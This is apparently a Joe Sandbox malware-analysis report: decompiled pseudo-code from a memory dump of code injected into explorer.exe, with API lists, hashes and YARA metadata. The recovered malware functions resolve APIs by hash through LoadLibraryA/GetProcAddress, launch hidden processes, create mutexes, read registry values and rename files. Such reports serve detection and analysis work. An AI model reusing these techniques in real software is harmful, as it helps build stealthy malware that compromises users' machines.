RegCloseKey.KERNEL32(00000000,?,?,000E2BFB,00000000,?,?,?,?,?,?,?,000000AF,?), ref: 000EC027

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: 7b9eb4dfe8053de56ace3e115b7041cf883cb7397839f783b078a3192771b85b
Instruction ID: a688166f7822bb7b0032163b59b083cc203ba758c9b8012c7f9ccde88c0e60bd
Opcode Fuzzy Hash: 7b9eb4dfe8053de56ace3e115b7041cf883cb7397839f783b078a3192771b85b
Instruction Fuzzy Hash: BF2129B6900158FFEB10DFAADC05EAEBBF8EF88740B1541A9F505E7121D7319A01EB51

Uniqueness

Uniqueness Score: -1.00%

Function 000EBEDD, Relevance: 6.1, APIs: 4, Instructions: 69
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E000EBEDD(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				intOrPtr* _t43;
				char* _t46;

				_t46 = 0;
				_v8 = 0;
				_v16 = 0;
				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
					return 0;
				}
				_v12 = 0;
				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
					_t46 = E000E85E5(_v12 + 1);
					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
						_t43 = _a12;
						if(_t43 != 0) {
							 *_t43 = _v12;
						}
					}
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				return _t46;
			}

0x000ebef0
0x000ebefa
0x000ebefd
0x000ebf05
0x00000000
0x000ebf07
0x000ebf0e
0x000ebf28
0x000ebf34
0x000ebf39
0x000ebf57
0x000ebf5c
0x000ebf61
0x000ebf61
0x000ebf5c
0x000ebf39
0x000ebf66
0x000ebf70
0x000ebf70
0x00000000

APIs

RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,025BFC18,00000000,?,00000002), ref: 000EBF00
RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 000EBF23
RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 000EBF50
RegCloseKey.KERNEL32(?,?,00000002), ref: 000EBF70

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: 7a1cd89e4aa79fb1985dc479645cc613d1ed8b5501508d2fef638e07a0ec6042
Instruction ID: 060b53470cd86bedda0c34bea0085b1560b4221ad2df52f22058a9e69dbceff6
Opcode Fuzzy Hash: 7a1cd89e4aa79fb1985dc479645cc613d1ed8b5501508d2fef638e07a0ec6042
Instruction Fuzzy Hash: 0C21D8B5A00158BF9B10DFAADD84EAFBBF8EF84740B0141A5F905E7125D730DA00DB91

Uniqueness

Uniqueness Score: -1.00%

Function 000E5624, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E000E5624(void* __edx, void* __edi) {
				char _v44;
				void* _t8;
				intOrPtr _t11;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr _t18;
				void* _t20;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t39;
				void* _t40;
				intOrPtr _t49;
				void* _t54;

				_t54 = __edi;
				_t8 = E000E9E47(0x3b); // executed
				if(_t8 != 0xffffffff) {
					L2:
					E000E97ED(0xfe6c8);
					_t39 = 0x37; // executed
					E000E9ED1(_t39);
					_t11 =  *0xfe688; // 0x80000
					_t40 = 0x3a; // executed
					E000E9ED1(_t40); // executed
					E000EE503(_t63);
					_t14 =  *0xfe688; // 0x80000
					_t41 =  &_v44;
					_t52 =  *((intOrPtr*)(_t14 + 0xac)) + 2;
					E000EA8AF( &_v44,  *((intOrPtr*)(_t14 + 0xac)) + 2, _t63);
					_t17 =  *0xfe684; // 0x25bf8f0
					_t18 =  *((intOrPtr*)(_t17 + 0xc4))(0, 0, 0,  &_v44,  *((intOrPtr*)(_t11 + 0x1640)), 0,  *0xfe6c8,  *0xfe6cc);
					 *0xfe74c = _t18;
					if(_t18 != 0) {
						_t20 = CreateMutexA(0, 0, 0);
						 *0xfe76c = _t20;
						__eflags = _t20;
						if(_t20 != 0) {
							_t34 = E000E85E5(0x1000);
							_t52 = 0;
							 *0xfe770 = _t34;
							_t49 =  *0xfe774; // 0x2
							__eflags = _t34;
							_t41 =  !=  ? 0 : _t49;
							 *0xfe774 =  !=  ? 0 : _t49; // executed
						}
						E000E1521(_t41, _t52); // executed
						E000E98CF(E000E2ECD, 0, __eflags, 0, 0); // executed
						E000E300A(); // executed
						E000E31B5(0, __eflags); // executed
						E000E299A(); // executed
						E000E3BA5(_t54, __eflags); // executed
						while(1) {
							__eflags =  *0xfe758; // 0x0
							if(__eflags != 0) {
								break;
							}
							E000E97ED(0xfe750);
							_push(0xfe750);
							_push(0xfe750); // executed
							E000E2784();
							Sleep(0xfa0);
						}
						E000E3D27();
						E000E9A6F();
						E000E34BE();
						_t33 = 0;
						__eflags = 0;
					} else {
						goto L3;
					}
				} else {
					_t36 = E000E2DBE();
					_t63 = _t36;
					if(_t36 != 0) {
						L3:
						_t33 = 1;
					} else {
						goto L2;
					}
				}
				return _t33;
			}

0x000e5624
0x000e5630
0x000e5639
0x000e5644
0x000e5649
0x000e565c
0x000e565d
0x000e5662
0x000e5672
0x000e5673
0x000e567b
0x000e5680
0x000e5685
0x000e568f
0x000e5692
0x000e569c
0x000e56a4
0x000e56aa
0x000e56b1
0x000e56c3
0x000e56c9
0x000e56ce
0x000e56d0
0x000e56d7
0x000e56dc
0x000e56de
0x000e56e4
0x000e56ea
0x000e56ec
0x000e56ef
0x000e56ef
0x000e56f5
0x000e5703
0x000e570a
0x000e570f
0x000e5714
0x000e5719
0x000e5743
0x000e5743
0x000e5749
0x00000000
0x00000000
0x000e5725
0x000e572a
0x000e572b
0x000e572c
0x000e573d
0x000e573d
0x000e574b
0x000e5750
0x000e5755
0x000e575a
0x000e575a
0x00000000
0x00000000
0x00000000
0x000e563b
0x000e563b
0x000e5640
0x000e5642
0x000e56b3
0x000e56b5
0x00000000
0x00000000
0x00000000
0x000e5642
0x000e5760

APIs

CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 000E56C3

Part of subcall function 000E97ED: GetSystemTimeAsFileTime.KERNEL32(?,?,000E5F90), ref: 000E97FA
Part of subcall function 000E97ED: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000E981A

Sleep.KERNELBASE(00000FA0), ref: 000E573D

Strings

2]a, xrefs: 000E5720

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: Time$CreateFileMutexSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: 2]a
API String ID: 3249252070-1308873663
Opcode ID: 8f1043d294e38328063ff95b529d3125261b45872a9827a209a419047fcf80a1
Instruction ID: 7225450e1965ccf72374544ef0f8700dc9b0cd42cd17639242151810fb9988e8
Opcode Fuzzy Hash: 8f1043d294e38328063ff95b529d3125261b45872a9827a209a419047fcf80a1
Instruction Fuzzy Hash: 0331D4316096C49FF324BB77EC0AAEA3B99DF443A5B000529F148E71B3EE349540D6A2

Uniqueness

Uniqueness Score: -1.00%

Function 000EDFEF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E000EDFEF(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E000ED442( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E000EC3BB( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

0x000edff8
0x000edffa
0x000edffd
0x000ee000
0x000ee006
0x000ee063
0x00000000
0x000ee063
0x000ee008
0x000ee013
0x000ee016
0x000ee01b
0x000ee020
0x000ee023
0x000ee025
0x000ee028
0x000ee02b
0x000ee030
0x00000000
0x00000000
0x00000000
0x00000000
0x000ee032
0x000ee032
0x000ee044
0x000ee051
0x000ee055
0x00000000
0x00000000
0x000ee057
0x000ee05a
0x000ee05b
0x000ee061
0x00000000
0x00000000
0x00000000
0x000ee061
0x000ee078
0x000ee07d
0x000ee081
0x00000000
0x000ee08d
0x000ee08d
0x000ee08f
0x000ee08f
0x000ee095
0x00000000
0x00000000
0x000ee09b
0x000ee09f
0x000ee0a3
0x00000000
0x00000000
0x00000000
0x000ee0a3
0x000ee0a9
0x000ee0b1
0x000ee0b6
0x000ee0b9
0x000ee0b9
0x000ee0bb
0x000ee0bf
0x000ee0c7
0x00000000
0x00000000
0x000ee0cb
0x000ee0d3
0x00000000
0x00000000
0x00000000
0x000ee0d3

APIs

LoadLibraryA.KERNEL32(.dll), ref: 000EE0BF
GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 000EE0CB

Strings

.dll, xrefs: 000EE0BB, 000EE0BE

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll
API String ID: 2574300362-2738580789
Opcode ID: 72a2b84a912958bdbea37a1de49f64c79ef1b785fd255a060605c3d7689a6135
Instruction ID: abccbf01fdff61d50c1338e1a7d6833dfaa0227fee8daa86ef1f8c1ce9cdf6c0
Opcode Fuzzy Hash: 72a2b84a912958bdbea37a1de49f64c79ef1b785fd255a060605c3d7689a6135
Instruction Fuzzy Hash: 4F31B271A002D99FDB64CFAAC884BAEBBE5AF44304F284469D805E7741DA70DD91CB90

Uniqueness

Uniqueness Score: -1.00%

Function 000EA953, Relevance: 4.6, APIs: 3, Instructions: 74
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E000EA953(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				signed int _t24;
				intOrPtr _t30;
				intOrPtr _t32;
				intOrPtr _t34;
				int _t42;
				WCHAR* _t44;

				_t42 = 0x44;
				memset( &_v92, 0, _t42);
				_v92.cb = _t42;
				asm("stosd");
				_t44 = 1;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 = _a16;
				if(_t24 != 0) {
					_v92.dwFlags = 1;
					_v92.wShowWindow = 0;
				}
				asm("sbb eax, eax");
				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t24 & 0x08000000, 0, 0,  &_v92,  &_v20) == 0) {
					_t44 = 0;
				} else {
					if(_a8 != 0) {
						_push(_a12);
						_t34 =  *0xfe684; // 0x25bf8f0
						_push(_v20.hProcess);
						if( *((intOrPtr*)(_t34 + 0x2c))() >= 0) {
							GetExitCodeProcess(_v20.hProcess, _a8);
						}
					}
					_t30 =  *0xfe684; // 0x25bf8f0
					 *((intOrPtr*)(_t30 + 0x30))(_v20.hThread);
					_t32 =  *0xfe684; // 0x25bf8f0
					 *((intOrPtr*)(_t32 + 0x30))(_v20);
				}
				return _t44;
			}

0x000ea95e
0x000ea967
0x000ea96e
0x000ea976
0x000ea97a
0x000ea97b
0x000ea97c
0x000ea97d
0x000ea97e
0x000ea983
0x000ea987
0x000ea98a
0x000ea98a
0x000ea997
0x000ea9b3
0x000ea9f0
0x000ea9b5
0x000ea9b8
0x000ea9ba
0x000ea9bd
0x000ea9c2
0x000ea9ca
0x000ea9d2
0x000ea9d2
0x000ea9ca
0x000ea9d8
0x000ea9e0
0x000ea9e3
0x000ea9eb
0x000ea9eb
0x000ea9f8

APIs

memset.MSVCRT ref: 000EA967
CreateProcessW.KERNEL32(00000000,00001388,00000000,00000000,00000000,000EC1ED,00000000,00000000,?,00000000,00000000,00000000,00000001), ref: 000EA9AE
GetExitCodeProcess.KERNEL32(00000000,?), ref: 000EA9D2

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: Process$CodeCreateExitmemset
String ID:
API String ID: 4170947310-0
Opcode ID: d7ee3ffd36fb4abe2c32e6b3cccda5386a78d8a45f5fdcefd15124373f9bf4e6
Instruction ID: 3d1e44370274f299573ec12103eeb04525b2c9b54fbc8370baafee8d691baa9e
Opcode Fuzzy Hash: d7ee3ffd36fb4abe2c32e6b3cccda5386a78d8a45f5fdcefd15124373f9bf4e6
Instruction Fuzzy Hash: A9215972A10158BFEF509FA9DC84EEEBBBCFF18340B014425FA11E6561D634AD40DB61

Uniqueness

Uniqueness Score: -1.00%

Function 000EB9DA, Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E000EB9DA(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E000E85E5(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E000E85FB( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}

0x000eb9dd
0x000eb9de
0x000eb9e5
0x000eb9ed
0x000eb9f1
0x000eb9fa
0x000eba40
0x000eba40
0x000eba07
0x000eba0f
0x000eba11
0x000eba17
0x000eba30
0x00000000
0x000eba32
0x000eba37
0x00000000
0x000eba3d
0x000eba19
0x000eba19
0x000eba19
0x000eba19
0x000eba17
0x000eba46

APIs

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,6CB00000,00000000,00000000,?,000EBA79,?,00000000,?,000ED0EA), ref: 000EB9F5
GetLastError.KERNEL32(?,000EBA79,?,00000000,?,000ED0EA), ref: 000EB9FC

Part of subcall function 000E85E5: RtlAllocateHeap.NTDLL(00000008,?,?,000E8F65,00000100,?,000E5FAC), ref: 000E85F3

GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,000EBA79,?,00000000,?,000ED0EA), ref: 000EBA2B

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: InformationToken$AllocateErrorHeapLast
String ID:
API String ID: 2499131667-0
Opcode ID: df6e0ab9923e1b952fa2b20833c35ecb4f08a9b44c40e668c0502dfc3b296657
Instruction ID: eb7116b02a469c4f80fa0559321391f621309fd6cdf8a51cf576a33743600e66
Opcode Fuzzy Hash: df6e0ab9923e1b952fa2b20833c35ecb4f08a9b44c40e668c0502dfc3b296657
Instruction Fuzzy Hash: 5C018BB2600159BF9B709BAADC49DAB7EACDF457A0B104125F506F3111EB70DE00E7A1

Uniqueness

Uniqueness Score: -1.00%

Function 000E58FF, Relevance: 4.5, APIs: 3, Instructions: 44
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000E58FF(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr _t10;
				void* _t13;
				void* _t19;
				signed int _t21;
				signed int _t22;

				_t13 = __edx;
				if(__ecx != 0) {
					_t22 = 0;
					_t19 = CreateMutexA(0, 1, __ecx);
					if(_t19 != 0) {
						if(GetLastError() != 0xb7 || E000EA501(_t19, _t13) != 0xffffffff) {
							_t22 = 1;
							 *_a4 = _t19;
						} else {
							_t10 =  *0xfe684; // 0x25bf8f0
							 *((intOrPtr*)(_t10 + 0x30))(_t19);
						}
					} else {
						GetLastError();
						_t22 = 0xffffffff;
					}
				} else {
					_t22 = _t21 | 0xffffffff;
				}
				return _t22;
			}

0x000e5903
0x000e5908
0x000e5914
0x000e5921
0x000e5925
0x000e593d
0x000e595d
0x000e595e
0x000e594d
0x000e594d
0x000e5953
0x000e5953
0x000e5927
0x000e5927
0x000e592d
0x000e592d
0x000e590a
0x000e590a
0x000e590a
0x000e5966

APIs

CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,000E59C0,000E5DB5,Global,000FBA14,?,00000000,?,00000002), ref: 000E591B
GetLastError.KERNEL32(?,?,000E59C0,000E5DB5,Global,000FBA14,?,00000000,?,00000002), ref: 000E5927

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID:
API String ID: 1925916568-0
Opcode ID: 657492c02a150b7aeea637288c9667d08dcad76575670c8816583e1a0926b35d
Instruction ID: 6b005b8b94b995bba0812ee455bca5e1f5cb026d71442df08e41f3fba6348fb5
Opcode Fuzzy Hash: 657492c02a150b7aeea637288c9667d08dcad76575670c8816583e1a0926b35d
Instruction Fuzzy Hash: D6F02831300894CFD621075BDC849FE7698EF95776BA10721F969F72D2CB748C0493A2

Uniqueness

Uniqueness Score: -1.00%

Function 000EA4B3, Relevance: 4.5, APIs: 3, Instructions: 30
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000EA4B3(CHAR* __ecx, void* __edx) {
				intOrPtr _t8;
				void* _t16;
				void* _t17;

				_t16 = __edx; // executed
				_t17 = CreateMutexA(0, 1, __ecx);
				if(_t17 != 0) {
					if(GetLastError() == 0xb7 && E000EA501(_t17, _t16) < 0) {
						_t8 =  *0xfe684; // 0x25bf8f0
						 *((intOrPtr*)(_t8 + 0x30))(_t17);
						_t17 = 0;
					}
					return _t17;
				}
				GetLastError();
				return 0;
			}

0x000ea4bf
0x000ea4c7
0x000ea4cb
0x000ea4e2
0x000ea4f1
0x000ea4f7
0x000ea4fa
0x000ea4fa
0x00000000
0x000ea4fc
0x000ea4cd
0x00000000

APIs

CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,000E4E07,00000000), ref: 000EA4C1
GetLastError.KERNEL32 ref: 000EA4CD
GetLastError.KERNEL32 ref: 000EA4D7

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: ErrorLast$CreateMutex
String ID:
API String ID: 200418032-0
Opcode ID: 9febcb19652d48a05c8d05025a5738307fc0fc9dfd72ef871ff564d0523142b2
Instruction ID: 4159b96b54754a4a414f0dc23d2e09e12203cb80983e1d023f9958906e1f1b22
Opcode Fuzzy Hash: 9febcb19652d48a05c8d05025a5738307fc0fc9dfd72ef871ff564d0523142b2
Instruction Fuzzy Hash: 4FF0E5323001A09FE660136AD84CF6A36949FDD751F021420F505EB6A1DEA8DC40D3A2

Uniqueness

Uniqueness Score: -1.00%

Function 000E6D81, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E000E6D81(void* __eflags, void* __fp0) {
				short _v536;
				WCHAR* _v544;
				WCHAR* _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				void* _t22;
				void* _t32;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t51;
				void* _t53;
				void* _t56;
				WCHAR* _t59;
				signed int _t60;
				void* _t62;
				void* _t63;
				void* _t74;

				_t74 = __fp0;
				_t34 =  *0xfe778; // 0x25bfc18
				_t62 = (_t60 & 0xfffffff8) - 0x21c;
				_t51 = 0x31;
				_t32 = 1; // executed
				_t9 = E000E9E9B(_t34, _t51); // executed
				if(_t9 != 0) {
					_t10 =  *0xfe78c; // 0x0
					_t66 = _t10;
					if(_t10 == 0) {
						_t49 =  *0xfe688; // 0x80000
						_t10 = E000EEE11(_t49 + 0xb0, _t51, _t66);
						 *0xfe78c = _t10;
					}
					_push(0);
					_push(_t10);
					_t11 =  *0xfe688; // 0x80000
					_push(L"\\c");
					_t9 = E000E92C6(_t11 + 0x438);
					_t59 = _t9;
					_t63 = _t62 + 0x10;
					_v544 = _t59;
					if(_t59 != 0) {
						while(1) {
							_t35 =  *0xfe688; // 0x80000
							_t56 = E000EA4B3(_t35 + 0x1878, 0x1388);
							if(_t56 == 0) {
								break;
							}
							if(E000EB2AB(_t59) == 0) {
								_t32 = E000EF191(_t59, 0x1388, _t74);
							}
							E000EA51D(_t56);
							_t41 =  *0xfe684; // 0x25bf8f0
							 *((intOrPtr*)(_t41 + 0x30))(_t56);
							if(_t32 > 0) {
								E000E97ED( &_v544);
								_t43 =  *0xfe778; // 0x25bfc18
								_t53 = 0x33;
								if(E000E9E9B(_t43, _t53) != 0) {
									L12:
									__eflags = E000E1C51(_t59, __eflags, _t74);
									if(__eflags >= 0) {
										E000EB1F3(_t59, _t53, __eflags, _t74);
										continue;
									}
								} else {
									_t46 =  *0xfe778; // 0x25bfc18
									_t53 = 0x12;
									_t22 = E000E9E9B(_t46, _t53);
									_t72 = _t22;
									if(_t22 != 0 || E000EA531(_t53, _t72) != 0) {
										_push(E000E97ED(0));
										E000E9621( &_v536, 0x104, L"%s.%u", _t59);
										_t63 = _t63 + 0x14;
										MoveFileW(_t59,  &_v536);
										continue;
									} else {
										goto L12;
									}
								}
							}
							break;
						}
						_t9 = E000E85FB( &_v544, 0xfffffffe);
					}
				}
				return _t9;
			}

0x000e6d81
0x000e6d87
0x000e6d8d
0x000e6d9a
0x000e6d9b
0x000e6d9c
0x000e6da3
0x000e6da9
0x000e6dae
0x000e6db0
0x000e6db2
0x000e6dbe
0x000e6dc3
0x000e6dc3
0x000e6dc8
0x000e6dca
0x000e6dcb
0x000e6dd5
0x000e6ddb
0x000e6de0
0x000e6de2
0x000e6de5
0x000e6deb
0x000e6df1
0x000e6df1
0x000e6e07
0x000e6e0b
0x00000000
0x00000000
0x000e6e1a
0x000e6e23
0x000e6e23
0x000e6e27
0x000e6e2c
0x000e6e33
0x000e6e38
0x000e6e3e
0x000e6e43
0x000e6e4b
0x000e6e53
0x000e6ea1
0x000e6ea8
0x000e6eaa
0x000e6eae
0x00000000
0x000e6eae
0x000e6e55
0x000e6e55
0x000e6e5d
0x000e6e5e
0x000e6e63
0x000e6e65
0x000e6e77
0x000e6e88
0x000e6e8d
0x000e6e96
0x00000000
0x00000000
0x00000000
0x00000000
0x000e6e65
0x000e6e53
0x00000000
0x000e6e38
0x000e6ebf
0x000e6ec5
0x000e6deb
0x000e6ecc

APIs

MoveFileW.KERNEL32 ref: 000E6E96

Strings

%s.%u, xrefs: 000E6E79

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: FileMove
String ID: %s.%u
API String ID: 3562171763-1288070821
Opcode ID: 964a1866d5f82cae04e21b6502152ab6bfbdd7592f6aa58c154e901ed3d763c2
Instruction ID: c7da49bac7c9d67f5b48bd16a6d0416153f3dbad9ebf6c9affe245a0c62b5e8a
Opcode Fuzzy Hash: 964a1866d5f82cae04e21b6502152ab6bfbdd7592f6aa58c154e901ed3d763c2
Instruction Fuzzy Hash: D1318F313043845FE620B767ED56ABE33999BA0790F500428FA11AB3D3EF25D905D792

Uniqueness

Uniqueness Score: -1.00%

Function 000E2ADD, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71
stringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E000E2ADD() {
				intOrPtr _v8;
				signed int _v12;
				CHAR* _v16;
				signed int _t16;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t26;
				void* _t29;
				signed int _t31;
				intOrPtr _t36;
				CHAR* _t38;
				intOrPtr _t39;
				void* _t40;

				_t15 =  *0xfe710 * 0x64;
				_t39 = 0;
				_v12 =  *0xfe710 * 0x64;
				_t16 = E000E85E5(_t15);
				_t38 = _t16;
				_v16 = _t38;
				if(_t38 != 0) {
					_t31 =  *0xfe710; // 0x2
					_t36 = 0;
					_v8 = 0;
					if(_t31 == 0) {
						L9:
						_push(_t38);
						E000E9F13(0xe); // executed
						E000E85FB( &_v16, _t39);
						return 0;
					}
					_t29 = 0;
					do {
						_t21 =  *0xfe714; // 0x25bfe88
						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
							if(_t39 != 0) {
								lstrcatA(_t38, "|");
								_t39 = _t39 + 1;
							}
							_t22 =  *0xfe714; // 0x25bfe88
							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
							_t26 = E000E95E2( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
							_t31 =  *0xfe710; // 0x2
							_t40 = _t40 + 0x18;
							_t36 = _v8;
							_t39 = _t39 + _t26;
						}
						_t36 = _t36 + 1;
						_t29 = _t29 + 0x20;
						_v8 = _t36;
					} while (_t36 < _t31);
					goto L9;
				}
				return _t16 | 0xffffffff;
			}

0x000e2ae3
0x000e2aed
0x000e2af0
0x000e2af3
0x000e2af8
0x000e2afa
0x000e2b00
0x000e2b0a
0x000e2b10
0x000e2b12
0x000e2b17
0x000e2b74
0x000e2b7a
0x000e2b7e
0x000e2b89
0x00000000
0x000e2b90
0x000e2b19
0x000e2b1b
0x000e2b1b
0x000e2b24
0x000e2b28
0x000e2b30
0x000e2b36
0x000e2b36
0x000e2b37
0x000e2b3c
0x000e2b40
0x000e2b56
0x000e2b5b
0x000e2b61
0x000e2b64
0x000e2b67
0x000e2b67
0x000e2b69
0x000e2b6a
0x000e2b6d
0x000e2b70
0x00000000
0x000e2b1b
0x00000000

APIs

Part of subcall function 000E85E5: RtlAllocateHeap.NTDLL(00000008,?,?,000E8F65,00000100,?,000E5FAC), ref: 000E85F3

